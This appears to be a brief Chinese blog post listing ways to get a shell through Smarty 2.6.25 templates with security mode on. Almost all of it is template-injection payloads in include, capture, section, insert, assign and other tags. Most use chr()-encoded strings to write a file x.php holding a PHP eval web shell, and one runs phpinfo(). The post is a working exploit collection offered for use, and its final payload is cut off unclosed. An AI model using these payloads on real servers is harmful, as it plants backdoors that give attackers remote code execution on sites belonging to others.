Smarty Get Shell的一些方法

在开启security选项关闭了php等直接执行代码的标签后的一些可用方法，测试版本Smarty version 2.6.25。

<{include file="{${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}"}>

<{include_php file="x" assign="1'.fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62)),'"}>

<{capture name={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>z<{/capture}>

<{section name={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>z<{/section}>

<{foreach from=1 item=x key="']);phpinfo();//"}>

<{insert name=x toby={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}}>

<{assign var={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}} value=x}>

<{rewrite a={${fputs(fopen(chr(120).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(79).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62))}}} 

标签分类：